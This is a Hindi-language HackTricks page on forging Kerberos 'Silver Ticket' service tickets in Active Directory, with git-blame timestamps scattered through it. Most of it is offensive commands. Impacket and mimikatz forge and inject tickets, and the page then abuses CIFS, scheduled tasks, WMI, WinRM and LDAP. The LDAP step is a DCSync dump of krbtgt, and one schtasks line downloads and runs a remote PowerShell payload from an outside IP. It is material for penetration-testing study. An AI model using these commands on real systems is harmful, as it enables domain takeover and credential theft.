2023-11-06 08:38:02 +00:00
# सिल्वर टिकट
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 05:12:53 +00:00
< summary > < strong > जानें AWS हैकिंग को शून्य से हीरो तक< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > के साथ!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-02 22:50:22 +00:00
HackTricks का समर्थन करने के अन्य तरीके:
2024-02-18 15:39:20 +00:00
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान** ](https://github.com/sponsors/carlospolop ) देखें!
2024-02-08 05:12:53 +00:00
* [**आधिकारिक PEASS और HackTricks स्वैग** ](https://peass.creator-spring.com ) प्राप्त करें
* हमारे विशेष [**NFTs** ](https://opensea.io/collection/the-peass-family ) कलेक्शन, [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ) खोजें
2024-02-18 15:39:20 +00:00
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह** ](https://discord.gg/hRep4RUj7f ) या [**टेलीग्राम समूह** ](https://t.me/peass ) या हमें **ट्विटर** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live ) पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud** github repos में PRs सबमिट करके।
2022-04-28 16:01:33 +00:00
< / details >
2024-02-18 15:39:20 +00:00
< figure > < img src = "../../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-02-18 15:39:20 +00:00
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप करें** , एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है** ! आज ही हमारे साथ शामिल हों [**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks ) और शुरू करें बाउंटी अप टू ** $100,000** तक कमाना!
2022-04-28 16:01:33 +00:00
2024-02-18 15:39:20 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2020-07-15 15:43:14 +00:00
2023-11-06 08:38:02 +00:00
## सिल्वर टिकट
2020-07-15 15:43:14 +00:00
2024-02-18 15:39:20 +00:00
**सिल्वर टिकट** हमला Active Directory (AD) environments में सेवा टिकट का उपयोग करता है। इस विधि पर **किसी सेवा खाते के NTLM हैश को प्राप्त करने** पर निर्भर है, जैसे कि कंप्यूटर खाता, एक टिकट ग्रांटिंग सेवा (TGS) टिकट बनाने के लिए। इस जाली टिकट के साथ, एक हमलावर नेटवर्क पर विशेष सेवाओं तक पहुंच सकता है, **किसी भी उपयोगकर्ता का अनुकरण** करते हुए, आम तौर पर प्रशासनिक विशेषाधिकारों के लिए लक्ष्य रखता है। यह जोर दिया जाता है कि टिकट बनाने के लिए AES कुंजियों का उपयोग करना अधिक सुरक्षित और कम पकड़ने योग्य है।
2022-05-24 00:07:19 +00:00
2024-02-18 15:39:20 +00:00
टिकट निर्माण के लिए, विभिन्न उपकरणों का उपयोग ऑपरेटिंग सिस्टम पर किया जाता है:
2020-07-15 15:43:14 +00:00
2024-02-08 05:12:53 +00:00
### लिनक्स पर
2020-07-15 15:43:14 +00:00
```bash
2024-02-08 05:12:53 +00:00
python ticketer.py -nthash < HASH > -domain-sid < DOMAIN_SID > -domain < DOMAIN > -spn < SERVICE_PRINCIPAL_NAME > < USER >
export KRB5CCNAME=/root/impacket-examples/< TICKET_NAME > .ccache
python psexec.py < DOMAIN > /< USER > @< TARGET > -k -no-pass
2023-12-26 03:49:11 +00:00
```
2024-02-08 05:12:53 +00:00
### Windows पर
2020-07-15 15:43:14 +00:00
```bash
2024-02-08 05:12:53 +00:00
# Create the ticket
mimikatz.exe "kerberos::golden /domain:< DOMAIN > /sid:< DOMAIN_SID > /rc4:< HASH > /user:< USER > /service:< SERVICE > /target:< TARGET > "
2020-07-15 15:43:14 +00:00
2024-02-08 05:12:53 +00:00
# Inject the ticket
mimikatz.exe "kerberos::ptt < TICKET_FILE > "
.\Rubeus.exe ptt /ticket:< TICKET_FILE >
2020-07-15 15:43:14 +00:00
2024-02-08 05:12:53 +00:00
# Obtain a shell
.\PsExec.exe -accepteula \\< TARGET > cmd
```
2024-01-02 22:50:22 +00:00
## उपलब्ध सेवाएं
2022-05-24 00:07:19 +00:00
2024-02-08 05:12:53 +00:00
| सेवा प्रकार | सेवा सिल्वर टिकट |
2023-12-16 15:25:38 +00:00
| ------------------------------------------ | -------------------------------------------------------------------------- |
| WMI | < p > HOST< / p > < p > RPCSS< / p > |
2024-02-09 04:37:44 +00:00
| PowerShell Remoting | < p > HOST< / p > < p > HTTP< / p > < p > ओएस के आधार पर:< / p > < p > WSMAN< / p > < p > RPCSS< / p > |
2024-02-08 05:12:53 +00:00
| WinRM | < p > HOST< / p > < p > HTTP< / p > < p > कुछ मौकों पर आप सीधे पूछ सकते हैं: WINRM< / p > |
2023-12-26 03:49:11 +00:00
| निर्धारित कार्य | HOST |
2024-02-09 04:37:44 +00:00
| Windows फ़ाइल साझा, जैसे psexec | CIFS |
2024-02-08 05:12:53 +00:00
| LDAP कार्यों, समेत DCSync | LDAP |
| Windows रिमोट सर्वर प्रशासन उपकरण | < p > RPCSS< / p > < p > LDAP< / p > < p > CIFS< / p > |
2023-12-16 15:25:38 +00:00
| Golden Tickets | krbtgt |
2021-01-04 22:37:21 +00:00
2024-02-08 05:12:53 +00:00
**Rubeus** का उपयोग करके आप इन सभी टिकट के लिए पूछ सकते हैं इस पैरामीटर का उपयोग करके:
2021-01-04 22:37:21 +00:00
* `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
2024-02-08 05:12:53 +00:00
### सिल्वर टिकट्स इवेंट आईडी
2021-01-04 23:12:42 +00:00
2024-02-08 05:12:53 +00:00
* 4624: खाता लॉगऑन
* 4634: खाता लॉगऑफ
* 4672: व्यवस्थापक लॉगऑन
## सेवा टिकट का दुरुपयोग
2024-02-18 15:39:20 +00:00
निम्नलिखित उदाहरणों में यह सोचा जाता है कि टिकट प्रशासक खाता का अनुकरण करके प्राप्त किया गया है।
2021-01-04 23:12:42 +00:00
2022-05-24 00:07:19 +00:00
### CIFS
2021-01-04 23:12:42 +00:00
2024-02-18 15:39:20 +00:00
इस टिकट के साथ आप `SMB` के माध्यम से `C$` और `ADMIN$` फ़ोल्डर तक पहुँच सकेंगे (अगर वे उजागर हैं) और दूरस्थ फ़ाइल सिस्टम के किसी हिस्से में फ़ाइलें कॉपी कर सकेंगे:
2021-01-04 23:12:42 +00:00
```bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
```
2024-02-08 05:12:53 +00:00
### होस्ट
2021-01-04 23:12:42 +00:00
2024-02-18 15:39:20 +00:00
इस अनुमति के साथ आप दूरस्थ कंप्यूटर में निर्धारित समय सारणियों को उत्पन्न कर सकते हैं और विचित्र आदेशों को क्रियान्वित कर सकते हैं:
2021-01-04 23:12:42 +00:00
```bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
2021-07-20 16:34:25 +00:00
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
2021-01-04 23:12:42 +00:00
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
```
2024-02-08 05:12:53 +00:00
### होस्ट + RPCSS
2021-01-04 23:12:42 +00:00
2024-02-08 05:12:53 +00:00
इन टिकट्स के साथ आप **पीड़ित सिस्टम में WMI का निष्पादन कर सकते हैं** :
2021-01-04 23:12:42 +00:00
```bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
#You can also use wmic
2021-07-26 15:11:57 +00:00
wmic remote.computer.local list full /format:list
2021-01-04 23:12:42 +00:00
```
2024-02-08 05:12:53 +00:00
### होस्ट + WSMAN (WINRM)
2023-12-26 03:49:11 +00:00
2024-02-18 15:39:20 +00:00
एक कंप्यूटर पर winrm एक्सेस के साथ आप **इसे एक्स
2021-01-04 23:12:42 +00:00
```bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
```
2022-05-24 00:07:19 +00:00
### LDAP
2021-01-04 23:12:42 +00:00
2023-12-26 03:49:11 +00:00
इस विशेषाधिकार के साथ आप **DCSync** का उपयोग करके DC डेटाबेस को डंप कर सकते हैं:
2022-05-24 00:07:19 +00:00
```
2021-01-04 23:12:42 +00:00
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
```
2024-02-18 15:39:20 +00:00
**DCSync** के बारे में अधिक जानकारी पाने के लिए निम्नलिखित पृष्ठ पर जाएं:
2024-02-08 05:12:53 +00:00
## संदर्भ
2024-02-18 15:39:20 +00:00
2024-02-08 05:12:53 +00:00
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets )
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/ ](https://www.tarlogic.com/blog/how-to-attack-kerberos/ )
2021-01-04 23:12:42 +00:00
2022-05-24 00:07:19 +00:00
{% content-ref url="dcsync.md" %}
[dcsync.md ](dcsync.md )
{% endcontent-ref %}
2024-02-18 15:39:20 +00:00
< figure > < img src = "../../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2021-01-04 23:12:42 +00:00
2024-02-18 15:39:20 +00:00
**बग बाउंटी टिप**: **Intigriti** में **साइन अप करें** , एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है** ! हमारे साथ शामिल हों [**https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks ) आज ही, और शुरू करें बाउंटी कमाना तक ** $100,000** तक!
2022-04-28 16:01:33 +00:00
2024-02-18 15:39:20 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-18 15:39:20 +00:00
< summary > < strong > जीरो से हीरो तक AWS हैकिंग सीखें< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2024-01-02 22:50:22 +00:00
HackTricks का समर्थन करने के अन्य तरीके:
2022-04-28 16:01:33 +00:00
2024-02-18 15:39:20 +00:00
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें** ](https://github.com/sponsors/carlospolop )!
2024-01-02 22:50:22 +00:00
* [**आधिकारिक PEASS & HackTricks स्वैग** ](https://peass.creator-spring.com ) प्राप्त करें
2024-02-09 04:37:44 +00:00
* हमारे विशेष [**NFTs** ](https://opensea.io/collection/the-peass-family ) कलेक्शन, [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ) खोजें
2024-02-18 15:39:20 +00:00
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह** ](https://discord.gg/hRep4RUj7f ) या [**टेलीग्राम समूह** ](https://t.me/peass ) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) और [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos में।
2022-04-28 16:01:33 +00:00
< / details >